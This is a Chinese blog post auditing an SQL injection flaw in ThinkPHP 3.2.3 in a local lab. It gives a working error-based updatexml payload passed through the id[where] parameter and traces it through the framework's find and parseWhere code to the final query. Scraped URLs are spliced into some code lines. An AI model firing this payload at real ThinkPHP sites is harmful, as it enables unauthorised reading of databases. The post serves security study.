代码审计|thinkPHP3.2.3sql注入漏洞 cms|php|thinkphp|thinkPHP

前言攻敌所必救：

ThinkPHP中的常用方法汇总总结:M方法，D方法，U方法，I方法
Thinkphp3.2.3 安全开发须知

搭建：

首先第一步就是必须先放在www目录下(我是windows用的phpstudy)！！！！
创建数据库，表名一定与你接下来要M的名字的相对应
连接数据库的文件不多说了，自己配置：ThinkPHP/Conf/convention.php
配置控制器：\WWW\thinkphp3.2.3\Application\Home\Controller\IndexController.class.php

show('原来内容已经省略，太占地方'); $data = https://www.it610.com/article/M('user')->find(I('GET.id')); var_dump($data); } }
测试：

文章图片

正文 payload：
?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23
确实报错注入成功，一切都是因为这句代码的存在：

$data = https://www.it610.com/article/M('user')->find(I('GET.id'));

I和M方法都没有什么问题，真正的问题在于

find 方法上，来自/ThinkPHP/Mode/Lite/Model.class.php

public function find($options=array()) {// 根据复合主键查找记录 $pk=$this->getPk(); if (is_array($options) && (count($options) > 0) && is_array($pk)) { //但是会进入这里 // 根据复合主键查询 $count = 0; foreach (array_keys($options) as $key) {if (is_int($key)) $count++; } if ($count == count($pk)) {$i = 0; foreach ($pk as $field) {$where[$field] = $options[$i]; unset($options[$i++]); } $options['where']=$where; } else {return false; } } // 总是查找一条记录 $options['limit']=1; // 分析表达式 $options=$this->_parseOptions($options); //前面都没有什么影响，重点是这里的函数调用 $resultSet=$this->db->select($options); //重要的一步

2._parseOptions：因为主要针对options[where]所以无关代码我全删除了
/ThinkPHP/Library/Think/Model.class.php

protected function _parseOptions($options=array()) {if(is_array($options)) $options =array_merge($this->options,$options); // 字段类型验证 if(isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join'])) { //这里不满足is_array($options['where']) // 对数组查询条件进行字段类型检查 foreach ($options['where'] as $key=>$val){$key=trim($key); if(in_array($key,$fields,true)){if(is_scalar($val)) {$this->_parseType($options['where'],$key); } }elseif(!is_numeric($key) && '_' != substr($key,0,1) && false === strpos($key,'.') && false === strpos($key,'(') && false === strpos($key,'|') && false === strpos($key,'&')){if(!empty($this->options['strict'])){E(L('_ERROR_QUERY_EXPRESS_').':['.$key.'=>'.$val.']'); } unset($options['where'][$key]); } } } //上面均没用，到现在开始有用： // 查询过后清空sql表达式组装避免影响下次查询 $this->options=array(); // 表达式过滤 $this->_options_filter($options); //这里值得注意 return $options; }

3._options_filter
到这就无了

文章图片

而且上面的操作也会清零 $options，所以这里可能是进错了
所以更正第二部的跟踪，改为
2.select：/ThinkPHP/Library/Think/Db/Driver.class.php

public function select($options=array()) {$this->model=$options['model']; $this->parseBind(!empty($options['bind'])?$options['bind']:array()); $sql= $this->buildSelectSql($options); $result= $this->query($sql,!empty($options['fetch_sql']) ? true : false); return $result; }

3.buildSelectSql：地址同上

public function buildSelectSql($options=array()) {if(isset($options['page'])) {// 根据页数计算limit list($page,$listRows)=$options['page']; $page=$page>0 ? $page : 1; $listRows=$listRows>0 ? $listRows : (is_numeric($options['limit'])?$options['limit']:20); $offset=$listRows*($page-1); $options['limit'] =$offset.','.$listRows; } $sql=$this->parseSql($this->selectSql,$options); return $sql; }

4.parseSql：地址同上

public function parseSql($sql,$options=array()){$sql= str_replace( array('%TABLE%','%DISTINCT%','%FIELD%','%JOIN%','%WHERE%','%GROUP%','%HAVING%','%ORDER%','%LIMIT%','%UNION%','%LOCK%','%COMMENT%','%FORCE%'), array( $this->parseTable($options['table']), $this->parseDistinct(isset($options['distinct'])?$options['distinct']:false), $this->parseField(!empty($options['field'])?$options['field']:'*'), $this->parseJoin(!empty($options['join'])?$options['join']:''), $this->parseWhere(!empty($options['where'])?$options['where']:''), $this->parseGroup(!empty($options['group'])?$options['group']:''), $this->parseHaving(!empty($options['having'])?$options['having']:''), $this->parseOrder(!empty($options['order'])?$options['order']:''), $this->parseLimit(!empty($options['limit'])?$options['limit']:''), $this->parseUnion(!empty($options['union'])?$options['union']:''), $this->parseLock(isset($options['lock'])?$options['lock']:false), $this->parseComment(!empty($options['comment'])?$options['comment']:''), $this->parseForce(!empty($options['force'])?$options['force']:'') ),$sql); return $sql; }

5.parseWhere：同上

protected function parseWhere($where) {$whereStr = ''; if(is_string($where)) { //直接满足，直接进入 // 直接使用字符串条件 $whereStr = $where; }else{ // 使用数组表达式 } return empty($whereStr)?'':' WHERE '.$whereStr; }

最后$sql=where 1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23
然后

$result= $this->query($sql,!empty($options['fetch_sql']) ? true : false); return $result;

整个过程没有任何过滤，seay分析thinkPHP太飞费劲了
PHPstorm断点审计： payload不变：
?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23
还是跟踪find函数：

文章图片

跟踪到这里步入一下，继续跟踪，跟踪到最后会跳出这个函数并且，值依然没有改变，同时步入下一个函数

文章图片

经核实，步入到了另一个函数中：

文章图片

继续跟踪buildSelectSql：

文章图片

继续跟踪parseSql：

文章图片

最后的代码变成了：
【代码审计|thinkPHP3.2.3sql注入漏洞】SELECT * FROM user WHERE 1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)# LIMIT 1
还是debug起来方便，基本不需要怎么动脑